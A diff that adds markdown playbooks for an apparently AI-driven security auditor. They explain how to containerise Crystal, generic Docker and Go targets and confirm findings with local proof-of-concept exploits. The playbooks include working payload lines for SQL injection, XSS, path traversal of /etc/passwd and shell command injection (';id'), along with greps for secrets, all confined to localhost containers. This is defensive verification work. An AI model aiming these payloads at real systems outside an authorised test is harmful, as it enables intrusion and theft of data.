+# then add: --network vulnnet -e DATABASE_URL=postgres://postgres:poc@vuln-db/app_development
+```
+
+## 4. Dependencies — install / restore
+
+`shards` is the package manager (ships in the Crystal image). Inside the build
+container or via `docker run ... crystallang/crystal`:
+
+```sh
+shards install            # resolves & vendors into lib/ per shard.lock
+shards check              # verify installed deps match shard.lock
+```
+
+If `shard.lock` is present, `shards install` honors it (reproducible). Crystal's
+own stdlib needs no install. Native shards may need system libs (`libpq`,
+`libsqlite3`, `libyaml`, `openssl`); the official image carries the common ones,
+otherwise `apk add`/`apt-get install` the missing `-dev` package in the run cmd.
+
+## 5. Run & health-check
+
+Default ports by framework: **Kemal 3000**, **Lucky 5000** (`5001` boot env),
+**Amber 3000**, **Grip 3000**, **Athena 3000/8080**. Confirm the real bind in
+code: grep `Kemal.run`, `Kemal.config.port`, `Amber::Server`, `Lucky::Server`,
+or `HTTP::Server.new ... .listen(...)`.
+
+Confirm the app is up before firing the PoC:
+
+```sh
+docker logs vuln-crystal 2>&1 | tail -20          # look for "listening on .../3000"
+# poll until healthy (bounded loop: up to 30 tries, 1s apart — never a blind sleep):
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null http://127.0.0.1:3000/ && { echo up; break; }
+  [ "$i" = 30 ] && { echo "DOWN"; docker logs vuln-crystal 2>&1 | tail -40; } || sleep 1
+done
+```
+
+If the build fails, capture `docker logs` / compiler output — a build failure is
+itself a valid `build-only` outcome (section 9), not a dead end.
+
+## 6. Seed — minimal state for auth/stateful PoCs
+
+Only seed what the PoC strictly needs; keep it inside the container.
+
+- **Migrations:** Lucky `crystal run tasks.cr -- db.migrate` (or
+  `lucky db.create && lucky db.migrate`); Amber `amber db migrate`; raw — run
+  the project's `db/migrations/*.sql` against `vuln-db`.
+- **Seed/test user:** prefer the project's own seed task
+  (`crystal run tasks.cr -- db.seed`, `amber db seed`). If none, insert a single
+  throwaway account directly:
+
+  ```sh
+  docker exec -i vuln-db psql -U postgres -d app_development \
+    -c "CREATE EXTENSION IF NOT EXISTS pgcrypto;" -c "INSERT INTO users (email, password_digest, role) \
+        VALUES ('poc@local.test', crypt('poc-pass', gen_salt('bf')), 'user');"
+  ```
+
+  Use obviously-fake, local-only credentials (`poc@local.test` / `poc-pass`).
+  Never real or production-shaped secrets. Record exactly what you seeded in
+  `Repro.setup_commands`.
+
+## 7. Fire the PoC safely
+
+Send the exploit at the local container only. Containment rules (binding):
+
+- Target is always `http://127.0.0.1:<port>` (the mapped container) — never an
+  external host or a URL pulled from the finding's real-world context.
+- Use the throwaway creds from section 6; no real tokens/cookies.
+- For SSRF/file-read PoCs, prove impact with a benign in-container marker (e.g.
+  read `/etc/passwd` or hit `http://127.0.0.1:<port>/_internal`) — do not reach
+  out to the internet or cloud metadata endpoints.
+- Capture request + response verbatim for `Repro.observed` (the evidence).
+
+Examples — adapt to the finding's `dynamic_poc_plan`:
+
+```sh
+# SQL injection (auth bypass / boolean) — observe row count or 200 vs 401:
+curl -sS -i "http://127.0.0.1:3000/search?q=%27%20OR%201%3D1--%20"
+
+# Reflected XSS — observe payload echoed unescaped in the body:
+curl -sS "http://127.0.0.1:3000/greet?name=<script>alert(1)</script>" | grep -F '<script>'
+
+# Path traversal — observe file contents leaking:
+curl -sS "http://127.0.0.1:3000/files?path=../../../../etc/passwd"
+
+# OS command injection (Process.run shell:true sink) — observe injected output:
+curl -sS "http://127.0.0.1:3000/ping?host=127.0.0.1;id"
+
+# Auth'd IDOR — login, reuse cookie, access another id (all local):
+curl -sS -c /tmp/cj -d 'email=poc@local.test&password=poc-pass' \
+  http://127.0.0.1:3000/login
+curl -sS -b /tmp/cj "http://127.0.0.1:3000/orders/1"   # id you do not own
+```
+
+Save the transcript:
+
+```sh
+{ echo "# request"; echo "$REQ"; echo "# response"; echo "$RESP"; } > /tmp/poc-evidence.txt
+```
+
+If the observed behavior matches the predicted impact, set
+`Repro.reproduced=true`, `method=live-exploit`, and paste request+response into
+`observed`.
+
+## 8. Teardown
+
+Leave no containers, networks, volumes, or worktree behind:
+
+```sh
+docker rm -f vuln-crystal vuln-db 2>/dev/null || true
+docker compose down -v 2>/dev/null || true       # if compose was used
+docker network rm vulnnet 2>/dev/null || true
+docker image rm vuln-crystal:poc 2>/dev/null || true
+
+# Remove the worktree if you created it manually (skip if the harness owns it):
+git -C /path/to/target worktree remove --force /tmp/vuln-crystal
+```
+
+If the harness provided the worktree (`isolation:'worktree'`), it is reclaimed
+automatically — do not call `worktree remove` on it.
+
+## 9. Fallbacks — when it cannot run live
+
+Degrade gracefully and set `Repro.method` to match what you actually achieved:
+
+1. **Unit/spec PoC (`method=unit-test`)** — if the app won't boot (missing
+   service, broken migration) but the vulnerable function is reachable in
+   isolation, write a Crystal spec under `spec/` that drives the source→sink path
+   and asserts the exploit. Run it in the image:
+
+   ```sh
+   docker run --rm -v "$PWD":/app -w /app crystallang/crystal:latest \
+     sh -c 'shards install && crystal spec spec/poc_spec.cr'
+   ```
+
+   A green assertion proving the unsafe behavior is the evidence.
+
+2. **Build-only (`method=build-only`)** — if it compiles but cannot be exercised
+   (no usable entry point), record the successful `crystal build` and the static
+   source→sink trace; impact stays argued, not observed.
+
+3. **Static PoC (`method=static-poc`)** — if nothing builds (toolchain/dep
+   unavailable, version skew), fall back to the proven static trace: cite the
+   exact `file:line` source→sink, the missing sanitizer, and a crafted payload
+   that would trigger it. Set `reproduced=false`, explain the blocker in `notes`.
+
+Always record the actual environment (image tag, Crystal version, commit SHA) in
+`Repro.environment`, and the exact commands in `Repro.setup_commands`, so the
+finding is replayable.
diff --git a/plugins/security/prompts/playbooks/generic-docker.md b/plugins/security/prompts/playbooks/generic-docker.md
new file mode 100644
index 0000000..bb9da2a
--- /dev/null
+++ b/plugins/security/prompts/playbooks/generic-docker.md
@@ -0,0 +1,408 @@
+# ENV Playbook — Generic Docker
+
+Build, run, and exploit a target whose ground truth is its **Docker** packaging
+(a `Dockerfile` and/or `docker-compose.yml`) rather than a recognized language
+toolchain — or any target where the language playbook is missing and Docker is
+the reliable common denominator. This is also the universal isolation layer the
+other playbooks defer to. Docker-first by definition; the host may have **no**
+native toolchain for whatever lives inside the image. Use plain `docker build`/
+`docker run` as the reliable path; treat `docker compose` as opportunistic (the
+plugin is not guaranteed). Keep ALL traffic inside the local container — no
+external hosts, no real credentials, no data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only). The defining signal is a
+container manifest at or near the repo root:
+
+```sh
+ls Dockerfile* Containerfile docker-compose.yml docker-compose.yaml \
+   compose.yml compose.yaml .dockerignore 2>/dev/null
+find . -maxdepth 3 \( -iname 'Dockerfile*' -o -iname 'Containerfile' \
+   -o -iname 'docker-compose*.y*ml' -o -iname 'compose.y*ml' \) | head
+```
+
+- **Manifests:**
+  - `Dockerfile` / `Containerfile` — the build recipe. `FROM` reveals the real
+    underlying stack (e.g. `FROM node:22`, `FROM python:3.12`, `FROM golang`).
+    If a language playbook matches that base, prefer it for the inner details
+    and use this one only for the container plumbing.
+  - `docker-compose.yml` / `compose.yaml` — multi-service topology: which
+    services exist, build contexts, exposed ports, env, volumes, and
+    dependencies (`depends_on`).
+  - `.dockerignore` — what the project itself excludes from the build context.
+- **Read the Dockerfile** — it is the ground truth for build steps, exposed
+  port, and start command:
+
+  ```sh
+  grep -nE '^(FROM|ARG|ENV|EXPOSE|WORKDIR|ENTRYPOINT|CMD|USER)' Dockerfile
+  ```
+
+  - `EXPOSE <port>` → the in-container listen port (map this).
+  - `ENTRYPOINT` / `CMD` → how the app starts (this is what runs by default).
+  - `FROM ... AS build` (multi-stage) → the final stage is the runtime; earlier
+    stages are throwaway build tooling.
+- **Read the compose file** — services, ports, and the entry service:
+
+  ```sh
+  # Prefer a real parse; fall back to grep if no compose plugin / python yaml:
+  docker compose config 2>/dev/null \
+    || python3 -c 'import yaml,sys;print(yaml.safe_load(open("docker-compose.yml")))' 2>/dev/null \
+    || grep -nE '^( {2,4})?(services|build|image|ports|environment|depends_on|command):' docker-compose.yml
+  ```
+
+  - `ports: ["8080:80"]` → host:container; the container side is what the app
+    listens on.
+  - The service with the build context that holds the vulnerable code is the
+    **app under test**; sidecars (db, redis, etc.) are support services.
+- **No language playbook applies, no `FROM` you recognize:** treat the image as
+  opaque and drive it purely through its declared port + entrypoint.
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Keep the build context lean and the host's git/state out of the image. Respect
+the project's own `.dockerignore`; only add one if it is missing:
+
+```sh
+[ -f .dockerignore ] || printf '.git\n' > .dockerignore   # worktree is throwaway
+```
+
+Use a finding-scoped compose project name (`-p va-$FID`) and unique image/
+container names so parallel repros never collide and teardown is exact.
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker (the common case here)
+
+This is the whole point of the stack — the project's own definition wires up
+the build, env, ports, dependent services, and the correct entrypoint.
+
+```sh
+# Plain docker with the repo Dockerfile (the reliable path).
+# Honor an alternate filename / build context if the project uses one:
+docker build -f Dockerfile -t $IMG .          # add --build-arg KEY=val if required by ARG
+```
+
+If the build context is a subdirectory (compose `build.context`), build from
+there: `docker build -f path/to/Dockerfile -t $IMG path/to/context`.
+
+```sh
+# Compose — opportunistic; only when the plugin exists AND the app needs its
+# sidecars (DB, cache) to boot. Brings up the whole topology:
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+```
+
+When compose is unavailable but the app needs a sidecar (e.g. Postgres), stand
+the dependency up by hand on a shared user network and point the app at it:
+
+```sh
+docker network create va-net-$FID 2>/dev/null
+docker run -d --name va-db-$FID --network va-net-$FID \
+  -e POSTGRES_PASSWORD=poc -e POSTGRES_DB=app postgres:16-alpine
+# then run the app on the same network with DATABASE_URL pointing at va-db-$FID
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Reaching here means recon found a compose `image:` (no build) or only loose
+files. Two sub-cases:
+
+- **Compose references a prebuilt `image:` (no `build:`):** just pull and run it
+  through compose, or `docker run` that image directly with the declared ports/
+  env. There is nothing to build.
+- **Loose files, unknown stack:** infer the runtime from what is present and
+  wrap it in a small base. Prefer the matching language playbook if one fits;
+  otherwise a generic Debian base plus the obvious install/start:
+
+  ```sh
+  cat > /tmp/Dockerfile.$FID <<'EOF'
+  FROM debian:12-slim
+  RUN apt-get update && apt-get install -y --no-install-recommends \
+        ca-certificates curl \
+    && rm -rf /var/lib/apt/lists/*
+  WORKDIR /app
+  COPY . .
+  # Install + start are stack-specific — set them from the files found:
+  #   static site:   RUN apt-get install -y python3   (serve with python3 -m http.server)
+  #   shell/binary:  RUN chmod +x ./run.sh
+  EXPOSE 8080
+  CMD ["sh", "-c", "echo 'set a real start command' && sleep infinity"]
+  EOF
+
+  docker build -f /tmp/Dockerfile.$FID --iidfile /tmp/va-$FID.iid -t $IMG .
+  ```
+
+The start command is whatever the Dockerfile `CMD`/`ENTRYPOINT` or compose
+`command:` declares. Bind the listener to `0.0.0.0`, not `127.0.0.1`, or a `-p`
+map cannot reach it (see Run & health-check for the loopback workaround).
+
+---
+
+## 4. Dependencies
+
+There is no separate restore step — for a Docker target, dependency install is
+**baked into the image build** (the Dockerfile's `RUN`/`COPY` layers, or the
+base `image:`'s contents). Notes:
+
+- Build deps reproducibly and from the pinned manifests the Dockerfile copies in
+  (e.g. `npm ci`, `pip install -r requirements.txt`, `go mod download`,
+  `bundle install`). Do **not** edit the Dockerfile to bump versions — that
+  changes the audited dependency set.
+- **Build-time `ARG`s:** if the build fails on a missing `ARG`, read the
+  `ARG`/`ENV` lines and pass safe placeholders
+  (`--build-arg NODE_ENV=development`). Never pass real secrets.
+- **Private registries / base images that won't pull:** if `FROM` points at a
+  private registry that needs auth, do not supply real credentials — note it and
+  fall back (build-only / static-poc).
+- **BuildKit secrets / SSH mounts** (`--mount=type=secret`): the build may need
+  `DOCKER_BUILDKIT=1`. Provide only a dummy secret file if one is strictly
+  required to get past the layer; never a real one.
+- Multi-stage builds already isolate build tooling from the runtime — let them;
+  do not flatten or alter the stages.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name. Map the host port to whatever the container listens on (the
+`EXPOSE` / compose `ports` container side):
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+CPORT=8080            # the in-container port from EXPOSE / compose ports / the listen call
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:$CPORT $IMG
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. If the
+project used compose, the published ports are already bound — find the mapped
+host port instead of re-running:
+
+```sh
+docker compose -p va-$FID ps                       # see published ports
+docker port "$(docker compose -p va-$FID ps -q <app-service>)" $CPORT
+```
+
+**If the app binds `127.0.0.1` inside the container,** a `-p` map can't reach it
+(loopback is per-namespace). Either fire the PoC from inside the container
+(`docker exec $CN ...`), or run with `--network host` on Linux so the
+container's loopback is the host's:
+
+```sh
+docker run -d --name $CN --network host $IMG       # then target 127.0.0.1:<code-port>
+```
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -sS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+docker ps --filter "name=$CN"      # confirm it didn't immediately exit
+```
+
+A 404 on `/` still means the server is up — any TCP/HTTP response counts as
+healthy. If the container exits immediately, `docker logs` shows why (missing
+env, dependent DB not ready, bad `CMD`). For a non-HTTP service, probe the port
+with `docker exec $CN sh -c "curl ... || nc -z 127.0.0.1 $CPORT"` or the
+relevant client. Common exposed ports follow the inner stack (web **8080/3000/
+5000/8000/80**, Postgres **5432**, MySQL **3306**, Redis **6379**) — but the
+Dockerfile/compose declaration is ground truth.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **Compose stacks** usually declare the DB and may auto-run migrations on boot
+  (`depends_on`, an entrypoint script, or a one-shot `migrate` service). Check
+  the compose file before seeding by hand. Run the project's own migration/seed
+  inside the app container:
+
+  ```sh
+  docker exec $CN sh -c '<project migrate cmd>'    # e.g. rails db:migrate, npm run migrate, ./manage.py migrate
+  docker exec $CN sh -c '<project seed cmd>' 2>/dev/null || true
+  ```
+
+- **Standalone sidecar DB** (started in step 3): create the schema/user the app
+  expects via the app's own migration command, or `docker exec va-db-$FID ...`
+  with the DB client for a single synthetic row.
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Cookie-session apps:
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/login"
+
+  # Bearer/JWT apps — capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/auth/login" \
+    | python3 -c 'import sys,json;d=json.load(sys.stdin);print(d.get("token") or d.get("access_token",""))')
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples by class (stack-agnostic —
+the container's declared port is the only entry point you target):
+
+```sh
+# SQL/NoSQL injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/user?id=1%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — pull a file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# Command injection / RCE — prove exec via a benign in-container sentinel, then
+# read it back (NEVER destructive commands):
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host.
+# Start a canary on $CN's own network namespace, then make the app fetch it:
+docker run -d --name va-canary-$FID --network "container:$CN" \
+  python:3-slim python3 -c 'import http.server,socketserver;socketserver.TCPServer(("127.0.0.1",9999),type("H",(http.server.BaseHTTPRequestHandler,),{"do_GET":lambda s:(s.send_response(200),s.end_headers(),s.wfile.write(b"CANARY"))})).serve_forever()'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/" | grep -o CANARY
+
+# Reflected/stored XSS — confirm the payload is reflected unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+```
+
+Docker-specific findings to fire against the running container itself:
+
+```sh
+# Container hardening / privilege — confirm the image runs as root (CWE-250) or
+# the container is over-privileged (misconfig). Evidence is the observed state:
+docker inspect -f '{{.Config.User}}' $CN          # empty/"root"/"0" => runs as root
+docker exec $CN id                                 # uid=0(root) confirms it
+docker exec $CN sh -c 'cat /proc/1/status | grep -i cap'   # effective capabilities
+
+# Hardcoded secrets baked into the image (CWE-798) — surface them from the
+# layers/env WITHOUT exfiltrating; print to local evidence only:
+docker exec $CN env | grep -iE 'pass|secret|token|key' | tee -a /tmp/poc.$FID.out
+docker history --no-trunc $IMG | grep -iE 'pass|secret|token|key' | head
+
+# Exposed/dangerous Docker socket mount (compose volumes: /var/run/docker.sock)
+# — if mounted, prove host-control reachability from inside the container:
+docker exec $CN sh -c 'test -S /var/run/docker.sock && echo DOCKER_SOCK_EXPOSED'
+```
+
+Evidence to record for the repro result:
+
+- The exact request/command (method, path, headers, body, or `docker` invocation)
+  → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, `uid=0`, leaked secret, exposed socket, 500 with
+  stack) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`'s network; no
+outbound connections to real hosts; no real data; side effects are benign
+sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN va-canary-$FID va-db-$FID 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker network rm va-net-$FID 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID 2>/dev/null || rm -rf /tmp/va-$FID
+git -C <target> worktree prune 2>/dev/null   # no-op for the non-git cp -a fallback
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`).
+
+1. **Image builds but the app can't fully serve (missing sidecar, env, or the
+   PoC targets a single function):** drive the vulnerable code path directly
+   inside the container — exec the app's own test, or a one-off harness that
+   calls the sink in whatever runtime the image provides. Set
+   `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test inside the image (command is stack-specific):
+   docker run --rm -v "$WT":/app -w /app $IMG sh -c '<test cmd for the matched stack>'
+   ```
+
+   For a Docker-config finding that has no running-app surface (e.g. proving the
+   built image runs as root or ships a secret), the build itself plus the
+   `docker inspect`/`docker history` evidence in step 7 IS the proof — record it
+   here as `method: unit-test` (config assertion) or `build-only` per fidelity.
+
+2. **Image builds but won't start at all (dependent DB/service absent, bad
+   entrypoint, private base resolved but service deps missing):** record that
+   `docker build` succeeds, the dependency set installs, and the vulnerable code
+   /misconfiguration is present in the image, with the line-referenced
+   source→sink (or Dockerfile/compose line) as evidence. Set `method: build-only`.
+
+   ```sh
+   docker build -f Dockerfile -t $IMG . && echo BUILD_OK
+   ```
+
+3. **Cannot build at all (base image won't pull, private registry, BuildKit
+   secret unavailable, network blocked):** construct a static PoC — the exact
+   crafted input (or the offending Dockerfile/compose lines) plus the
+   line-referenced source→sink path showing why it triggers. Set
+   `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/go.md b/plugins/security/prompts/playbooks/go.md
new file mode 100644
index 0000000..3265ad0
--- /dev/null
+++ b/plugins/security/prompts/playbooks/go.md
@@ -0,0 +1,411 @@
+# ENV Playbook — Go
+
+Build, run, and exploit a Go target (net/http / gin / echo / chi / fiber /
+gRPC, or a plain CLI / library) to reproduce a candidate finding with a real
+PoC. Docker-first; the native Go toolchain may be absent on the host. Keep ALL
+traffic inside the local container — no external hosts, no real credentials, no
+data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls go.mod go.sum go.work vendor/modules.txt Dockerfile docker-compose.yml 2>/dev/null
+find . -maxdepth 3 -name '*.go' -not -path '*/vendor/*' | head
+```
+
+- **Manifests:** `go.mod` (always for modules) declares the module path and the
+  `go` directive (the language/toolchain version — match the image to it).
+  `go.sum` pins dependency hashes. `go.work` means a multi-module workspace.
+- **Vendoring:** a `vendor/` dir with `vendor/modules.txt` → deps are checked in;
+  build offline with `-mod=vendor` (the default when `vendor/` is present).
+- **Entry point:** a `package main` with a `func main()` is a runnable binary.
+  Find it (and any `cmd/<name>/main.go` layout — Go's convention for multiple
+  binaries):
+
+  ```sh
+  grep -rl '^package main' --include='*.go' . | grep -v /vendor/
+  grep -rln 'func main' --include='*.go' . | grep -v /vendor/
+  ls cmd/ 2>/dev/null
+  ```
+
+- **Framework tells** (read `go.mod` `require` block, or imports):
+  - stdlib server → `net/http` (`http.ListenAndServe`, `http.HandleFunc`).
+  - Gin → `github.com/gin-gonic/gin`. Echo → `github.com/labstack/echo`.
+  - Chi → `github.com/go-chi/chi`. Fiber → `github.com/gofiber/fiber`
+    (fasthttp-based). gorilla/mux → `github.com/gorilla/mux`.
+  - gRPC → `google.golang.org/grpc`; usually a separate `*.proto` + generated
+    `*.pb.go`. Default port often `50051`.
+  - Library / CLI (no `ListenAndServe`, no `package main` server) → nothing to
+    serve; go to Fallbacks and drive the sink from a Go test.
+- **The listen address is ground truth.** Find the port and bind address — you
+  must map and bind exactly what the code listens on:
+
+  ```sh
+  grep -rnE 'ListenAndServe|\.Run\(|\.Listen\(|net\.Listen' --include='*.go' . | grep -v /vendor/
+  ```
+
+  Note whether it binds `:8080` (all interfaces, mappable) vs `127.0.0.1:8080`
+  (loopback only — see Run & health-check for how to still reach it).
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Keep the build context lean (the 3b Dockerfile copies the source in fresh;
+vendored deps come with it). Name the ignore file after that Dockerfile so BuildKit applies it:
+
+```sh
+printf '.git\n*.test\n' > /tmp/Dockerfile.$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up the build flags, env,
+DB, and the correct entry binary for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Go tag from the `go` directive in `go.mod` (fall back to a recent
+stable, e.g. `golang:1.23-bookworm`). A multi-stage build compiles in the SDK
+image and runs the static binary in a tiny base — fast to start, nothing extra
+in the runtime.
+
+```sh
+# Resolve the main package path (default to repo root "."):
+MAINPKG=$(grep -rl '^package main' --include='*.go' "$WT" | grep -v /vendor/ | head -1)
+MAINPKG=${MAINPKG:+./$(dirname "${MAINPKG#$WT/}")}; MAINPKG=${MAINPKG:-.}
+
+cat > /tmp/Dockerfile.$FID <<EOF
+FROM golang:1.23-bookworm AS build
+WORKDIR /src
+# Copy manifests first for layer caching; tolerate a missing go.sum.
+COPY go.mod go.sum* ./
+# Best-effort pre-fetch. vendor/ is not copied yet at this layer, so a vendored
+# (possibly offline) repo must not fail here; the build below then uses vendor/.
+RUN go mod download || true
+COPY . .
+# CGO off → a static binary that runs in a scratch/distroless base.
+# If the project needs cgo (sqlite3, etc.), drop CGO_ENABLED and use a glibc base.
+RUN CGO_ENABLED=0 go build -o /out/app $MAINPKG
+
+FROM gcr.io/distroless/base-debian12
+COPY --from=build /out/app /app
+EXPOSE 8080
+ENTRYPOINT ["/app"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID --iidfile /tmp/va-$FID.iid -t $IMG "$WT"
+```
+
+If the runtime needs a shell or extra tooling for the PoC (e.g. command-injection
+sentinels), swap the runtime stage to `debian:12-slim` or build the binary into
+the `golang` image and run from there directly:
+
+```sh
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 -w /src -v "$WT":/src:ro \
+  golang:1.23-bookworm sh -c "CGO_ENABLED=0 go build -o /tmp/app ${MAINPKG:-.} && /tmp/app"
+```
+
+Start command, by how the project runs (the binary must bind `0.0.0.0` /
+`:PORT`, not `127.0.0.1`, or the mapped host port can't reach it):
+
+- **Single server binary:** the built `/app` is the entry (the `ENTRYPOINT`
+  above). Pass config via flags/env at run time.
+- **Multiple binaries (`cmd/<name>`):** build the specific one
+  (`go build -o /out/app ./cmd/<name>`) — pick the server, not a migrator/CLI.
+- **Reads `PORT`/`ADDR` from env:** pass it (`-e PORT=8080`). Many Go servers
+  hardcode the listen addr — read the `ListenAndServe` arg; if it's
+  `127.0.0.1:8080`, see Run & health-check for the loopback workaround.
+- **Library / CLI only:** nothing to serve → Fallbacks, `method: unit-test`.
+
+---
+
+## 4. Dependencies
+
+Restore reproducibly; `go.sum` makes installs hash-verified and deterministic:
+
+```sh
+go mod download        # fetch modules listed in go.mod into the build cache
+go mod verify          # confirm cached modules match go.sum hashes
+```
+
+- **Vendored repos** (`vendor/` present): builds use it automatically; force it
+  with `go build -mod=vendor ./...`. No network needed — preferred when offline.
+- Do **not** `go get -u` / bump versions — that changes the audited dependency
+  set. Honor `go.mod`/`go.sum` exactly (`-mod=readonly`, the default for
+  modules, errors if a build would mutate them).
+- **cgo:** if a dep imports C (e.g. `mattn/go-sqlite3`), `CGO_ENABLED=0` fails to
+  build. Use `CGO_ENABLED=1` with a glibc base (`golang:1.23-bookworm` has gcc)
+  and run from a `debian:12-slim` runtime, not distroless/scratch.
+- **Private modules** (`GOPRIVATE`): if a require path can't resolve, it likely
+  needs auth — out of scope; do not supply real credentials. Note it and fall
+  back if the build blocks.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 \
+  -e PORT=8080 -e ADDR=0.0.0.0:8080 \
+  $IMG
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Map the
+container port (`:8080`) to whatever the code actually listens on (read the
+`ListenAndServe` arg — common defaults: net/http/chi/gorilla **8080**, Gin
+**8080**, Echo **1323**, Fiber **3000**, gRPC **50051**).
+
+**If the app binds `127.0.0.1` inside the container,** a `-p` map can't reach it
+(loopback is per-namespace). Either fire the PoC from inside the container
+(`docker exec $CN ...`, but distroless has no shell — use a `debian:12-slim`
+runtime), or run with `--network host` on Linux so the container's loopback is
+the host's:
+
+```sh
+docker run -d --name $CN --network host $IMG    # then target 127.0.0.1:<code-port>
+```
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -sS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+A 404 on `/` still means the server is up — any TCP/HTTP response counts as
+healthy. Look for the framework boot line in the logs (`Listening on`, Gin's
+`[GIN-debug] Listening and serving HTTP on`, Echo's banner, `http: server
+started`). For a **gRPC** target, plain `curl` won't health-check it; run a
+built-in self-check (`docker exec $CN /app -test`) only if the binary offers
